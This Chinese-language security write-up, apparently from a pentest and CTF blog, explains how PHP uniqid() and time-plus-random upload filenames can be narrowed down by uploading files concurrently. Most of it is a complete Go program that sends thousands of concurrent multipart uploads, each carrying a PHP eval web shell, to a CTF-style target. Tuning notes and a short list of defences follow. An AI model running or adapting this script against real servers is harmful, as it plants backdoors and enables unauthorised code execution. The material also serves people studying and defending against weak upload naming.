高效定位时间+随机数生成的上传文件名技术详解<\/h1>

一、问题背景<\/h2>
在渗透测试或CTF比赛中，常遇到一种任意文件上传漏洞，上传后的文件名由时间加随机数生成。常见生成方式包括：<\/p>
PHP的uniqid()<\/code>函数<\/li>
时间戳或秒数+随机数字组合<\/li>
<\/ul>
传统暴力猜解方法（如HEAD请求遍历）面对百万级可能性时效率低下（1-2小时），需要更高效的解决方案。<\/p>
二、技术原理分析<\/h2>
1. PHP uniqid()函数实现机制<\/h3>
通过分析PHP源码（uniqid.c）可知：<\/p>
do<\/span> {
<\/span><\/span>    (void<\/span>)gettimeofday((struct<\/span> timeval *<\/span>) &<\/span>tv, (struct<\/span> timezone *<\/span>) NULL);
<\/span><\/span>} while<\/span> (tv.tv_sec ==<\/span> prev_tv.tv_sec &&<\/span> tv.tv_usec ==<\/span> prev_tv.tv_usec);
<\/span><\/span>
<\/span><\/span>prev_tv.tv_sec =<\/span> tv.tv_sec;
<\/span><\/span>prev_tv.tv_usec =<\/span> tv.tv_usec;
<\/span><\/span>sec =<\/span> (int<\/span>) tv.tv_sec;
<\/span><\/span>usec =<\/span> (int<\/span>) (tv.tv_usec %<\/span> 0x100000<\/span>);
<\/span><\/span>
<\/span><\/span>if<\/span> (more_entropy) {
<\/span><\/span>    uniqid =<\/span> strpprintf(0<\/span>, "%s%08x%05x%.8F"<\/span>, prefix, sec, usec, php_combined_lcg() *<\/span> 10<\/span>);
<\/span><\/span>} else<\/span> {
<\/span><\/span>    uniqid =<\/span> strpprintf(0<\/span>, "%s%08x%05x"<\/span>, prefix, sec, usec);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>文件名组成结构：<\/p>

前缀（如"image_"）<\/li>
8位16进制秒数（固定部分）<\/li>
5位16进制微秒数（变化部分，模0x100000）<\/li>
可选额外熵值（当more_entropy为true时）<\/li>
<\/ul>
2. 文件名可能性计算<\/h3>
标准uniqid()生成的文件名：<\/p>

微秒部分变化范围：16^5 = 1,048,576种可能性<\/li>
每秒最多生成1,000,000个唯一ID（理论值）<\/li>
<\/ul>
三、高效解决方案<\/h2>
1. 核心思路：并发上传提高命中率<\/h3>
通过在一秒内上传多个文件：<\/p>

每个文件使用相同的秒数部分<\/li>
微秒部分自然变化<\/li>
相当于将百万级搜索空间压缩到千级<\/li>
<\/ul>
2. 技术实现细节<\/h3>
使用Go语言实现并发上传<\/h4>
package<\/span> main<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> (
<\/span><\/span>    "bytes"<\/span>
<\/span><\/span>    "fmt"<\/span>
<\/span><\/span>    "log"<\/span>
<\/span><\/span>    "mime\/multipart"<\/span>
<\/span><\/span>    "net\/http"<\/span>
<\/span><\/span>    "os"<\/span>
<\/span><\/span>    "path\/filepath"<\/span>
<\/span><\/span>    "time"<\/span>
<\/span><\/span>    "sync"<\/span>
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>func<\/span> newfileUploadRequest<\/span>(uri<\/span> string<\/span>, params<\/span> map<\/span>[string<\/span>]string<\/span>, paramName<\/span>, localfile<\/span> string<\/span>) (*<\/span>http<\/span>.Request<\/span>, error<\/span>) {
<\/span><\/span>    payload<\/span> :=<\/span> []byte(`<?php eval($_POST[c]);`<\/span>)
<\/span><\/span>    body<\/span> :=<\/span> &<\/span>bytes<\/span>.Buffer<\/span>{}
<\/span><\/span>    writer<\/span> :=<\/span> multipart<\/span>.NewWriter<\/span>(body<\/span>)
<\/span><\/span>    part<\/span>, err<\/span> :=<\/span> writer<\/span>.CreateFormFile<\/span>(paramName<\/span>, filepath<\/span>.Base<\/span>(localfile<\/span>))
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> nil<\/span>, err<\/span>
<\/span><\/span>    }
<\/span><\/span>    part<\/span>.Write<\/span>(payload<\/span>)
<\/span><\/span>    
<\/span><\/span>    for<\/span> key<\/span>, val<\/span> :=<\/span> range<\/span> params<\/span> {
<\/span><\/span>        _<\/span> = writer<\/span>.WriteField<\/span>(key<\/span>, val<\/span>)
<\/span><\/span>    }
<\/span><\/span>    err<\/span> = writer<\/span>.Close<\/span>()
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> nil<\/span>, err<\/span>
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    req<\/span>, err<\/span> :=<\/span> http<\/span>.NewRequest<\/span>("POST"<\/span>, uri<\/span>, body<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> nil<\/span>, err<\/span>
<\/span><\/span>    }
<\/span><\/span>    req<\/span>.Header<\/span>.Set<\/span>("Content-Type"<\/span>, writer<\/span>.FormDataContentType<\/span>())
<\/span><\/span>    req<\/span>.Header<\/span>.Set<\/span>("Connection"<\/span>, "close"<\/span>)
<\/span><\/span>    return<\/span> req<\/span>, nil<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>var<\/span> total<\/span> int<\/span>
<\/span><\/span>var<\/span> result<\/span> map<\/span>[int64<\/span>]int<\/span>
<\/span><\/span>
<\/span><\/span>func<\/span> main<\/span>() {
<\/span><\/span>    start<\/span> :=<\/span> time<\/span>.Now<\/span>()
<\/span><\/span>    filename<\/span> :=<\/span> "file"<\/span>
<\/span><\/span>    filepath<\/span>, _<\/span> :=<\/span> os<\/span>.Getwd<\/span>()
<\/span><\/span>    filepath<\/span> +=<\/span> "\/shell.php"<\/span>
<\/span><\/span>    result<\/span> = make(map<\/span>[int64<\/span>]int<\/span>, 10<\/span>)
<\/span><\/span>    wg<\/span> :=<\/span> &<\/span>sync<\/span>.WaitGroup<\/span>{}
<\/span><\/span>    lock<\/span> :=<\/span> &<\/span>sync<\/span>.Mutex<\/span>{}
<\/span><\/span>    done<\/span> :=<\/span> make(chan<\/span> struct<\/span>{}, 256<\/span>) \/\/ 最大并发256
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    for<\/span> i<\/span> :=<\/span> 0<\/span>; i<\/span> < 10000<\/span>; i<\/span>++<\/span> {
<\/span><\/span>        done<\/span> <-<\/span> struct<\/span>{}{}
<\/span><\/span>        if<\/span> i<\/span>%<\/span>64<\/span> ==<\/span> 0<\/span> {
<\/span><\/span>            time<\/span>.Sleep<\/span>(10<\/span> *<\/span> time<\/span>.Millisecond<\/span>)
<\/span><\/span>        }
<\/span><\/span>        wg<\/span>.Add<\/span>(1<\/span>)
<\/span><\/span>        go<\/span> doUpload<\/span>(filename<\/span>, filepath<\/span>, nil<\/span>, wg<\/span>, lock<\/span>)
<\/span><\/span>        <-<\/span>done<\/span>
<\/span><\/span>    }
<\/span><\/span>    wg<\/span>.Wait<\/span>()
<\/span><\/span>    
<\/span><\/span>    used<\/span> :=<\/span> time<\/span>.Since<\/span>(start<\/span>)
<\/span><\/span>    fmt<\/span>.Printf<\/span>("[*] done.\n[*] %d file uploaded. time used: %.2f\n"<\/span>, total<\/span>, used<\/span>.Seconds<\/span>())
<\/span><\/span>    for<\/span> sec<\/span>, cnt<\/span> :=<\/span> range<\/span> result<\/span> {
<\/span><\/span>        fmt<\/span>.Printf<\/span>("[*] %08x : %d\n"<\/span>, sec<\/span>, cnt<\/span>)
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>func<\/span> doUpload<\/span>(filename<\/span>, filepath<\/span> string<\/span>, params<\/span> map<\/span>[string<\/span>]string<\/span>, wg<\/span> *<\/span>sync<\/span>.WaitGroup<\/span>, lock<\/span> *<\/span>sync<\/span>.Mutex<\/span>) {
<\/span><\/span>    defer<\/span> wg<\/span>.Done<\/span>()
<\/span><\/span>    code<\/span>, date<\/span>, err<\/span> :=<\/span> upload<\/span>(filename<\/span>, filepath<\/span>, params<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        log<\/span>.Println<\/span>(err<\/span>)
<\/span><\/span>        return<\/span>
<\/span><\/span>    }
<\/span><\/span>    if<\/span> err<\/span> ==<\/span> nil<\/span> &&<\/span> code<\/span> ==<\/span> 200<\/span> {
<\/span><\/span>        lock<\/span>.Lock<\/span>()
<\/span><\/span>        total<\/span>++<\/span>
<\/span><\/span>        key<\/span> :=<\/span> date<\/span>.Unix<\/span>()
<\/span><\/span>        if<\/span> cnt<\/span>, has<\/span> :=<\/span> result<\/span>[key<\/span>]; has<\/span> {
<\/span><\/span>            result<\/span>[key<\/span>] = cnt<\/span> +<\/span> 1<\/span>
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            result<\/span>[key<\/span>] = 1<\/span>
<\/span><\/span>        }
<\/span><\/span>        lock<\/span>.Unlock<\/span>()
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>func<\/span> upload<\/span>(filename<\/span> string<\/span>, filepath<\/span> string<\/span>, params<\/span> map<\/span>[string<\/span>]string<\/span>) (code<\/span> int<\/span>, date<\/span> time<\/span>.Time<\/span>, err<\/span> error<\/span>) {
<\/span><\/span>    request<\/span>, err<\/span> :=<\/span> newfileUploadRequest<\/span>("http:\/\/ctf\/up.php"<\/span>, params<\/span>, filename<\/span>, filepath<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        log<\/span>.Println<\/span>(err<\/span>)
<\/span><\/span>        return<\/span>
<\/span><\/span>    }
<\/span><\/span>    timeout<\/span> :=<\/span> time<\/span>.Duration<\/span>(5<\/span> *<\/span> time<\/span>.Second<\/span>)
<\/span><\/span>    client<\/span> :=<\/span> &<\/span>http<\/span>.Client<\/span>{
<\/span><\/span>        Timeout<\/span>: timeout<\/span>,
<\/span><\/span>    }
<\/span><\/span>    resp<\/span>, err<\/span> :=<\/span> client<\/span>.Do<\/span>(request<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        log<\/span>.Println<\/span>(err<\/span>)
<\/span><\/span>        return<\/span>
<\/span><\/span>    }
<\/span><\/span>    code<\/span> = resp<\/span>.StatusCode<\/span>
<\/span><\/span>    datestring<\/span> :=<\/span> resp<\/span>.Header<\/span>.Get<\/span>("Date"<\/span>)
<\/span><\/span>    if<\/span> datestring<\/span> !=<\/span> ""<\/span> {
<\/span><\/span>        loc<\/span>, _<\/span> :=<\/span> time<\/span>.LoadLocation<\/span>("Asia\/Shanghai"<\/span>)
<\/span><\/span>        LongForm<\/span> :=<\/span> `Mon, 02 Jan 2006 15:04:05 MST`<\/span>
<\/span><\/span>        date<\/span>, _<\/span> = time<\/span>.Parse<\/span>(LongForm<\/span>, datestring<\/span>)
<\/span><\/span>    }
<\/span><\/span>    defer<\/span> resp<\/span>.Body<\/span>.Close<\/span>()
<\/span><\/span>    return<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键优化点<\/h4>


并发控制<\/strong>：<\/p>

使用sync.WaitGroup管理goroutine<\/li>
通过带缓冲的channel限制最大并发数（示例中为256）<\/li>
每64次上传后短暂休眠(10ms)防止过载<\/li>
<\/ul>
<\/li>

性能优化<\/strong>：<\/p>

设置Connection: close<\/code>头部避免连接复用限制<\/li>
将上传内容保存在内存中而非读取文件<\/li>
使用sync.Mutex保护共享数据<\/li>
<\/ul>
<\/li>

时间同步<\/strong>：<\/p>

从服务器响应头获取Date字段确认秒数<\/li>
使用相同的时间格式解析<\/li>
<\/ul>
<\/li>
<\/ol>
3. 实际效果<\/h3>
测试环境：<\/p>

本地：16G内存+i7 CPU笔记本+nginx+php7.0-fpm<\/li>
VPS：300ms ping延迟<\/li>
<\/ul>
性能数据：<\/p>

本地：1秒内上传5700+文件，约956次请求找到结果（0.1秒）<\/li>
VPS：1秒内上传1500文件<\/li>
搜索空间压缩：16^5\/1500 ≈ 699个可能性<\/li>
<\/ul>
四、其他应用场景<\/h2>
该方法同样适用于以下文件名生成方式：<\/p>
$newfile =<\/span> date<\/span>("dHis"<\/span>).<\/span>rand<\/span>(10000<\/span>, 99999<\/span>).<\/span>$extension;
<\/span><\/span><\/code><\/pre>只需调整：<\/p>

根据日期格式确定固定部分<\/li>
针对随机数部分进行并发上传<\/li>
<\/ol>
五、注意事项<\/h2>


服务器限制<\/strong>：<\/p>

注意目标服务器的并发连接限制<\/li>
避免触发DoS保护机制<\/li>
<\/ul>
<\/li>

网络优化<\/strong>：<\/p>

设置\/etc\/hosts减少DNS查询<\/li>
考虑直接使用TCP socket可能更快<\/li>
<\/ul>
<\/li>

时间精度<\/strong>：<\/p>

确保客户端与服务器时间同步<\/li>
处理可能的时区差异<\/li>
<\/ul>
<\/li>

结果验证<\/strong>：<\/p>

成功上传后需要验证文件是否可访问<\/li>
可能需要结合目录遍历等技术确认上传位置<\/li>
<\/ul>
<\/li>
<\/ol>
六、防御建议<\/h2>
针对此类攻击，服务器可采取以下防护措施：<\/p>

使用更强的随机数生成算法<\/li>
限制单IP上传频率<\/li>
对上传文件进行重命名时加入用户特定信息（如session ID）<\/li>
实施文件内容检查而非依赖文件名<\/li>
<\/ol>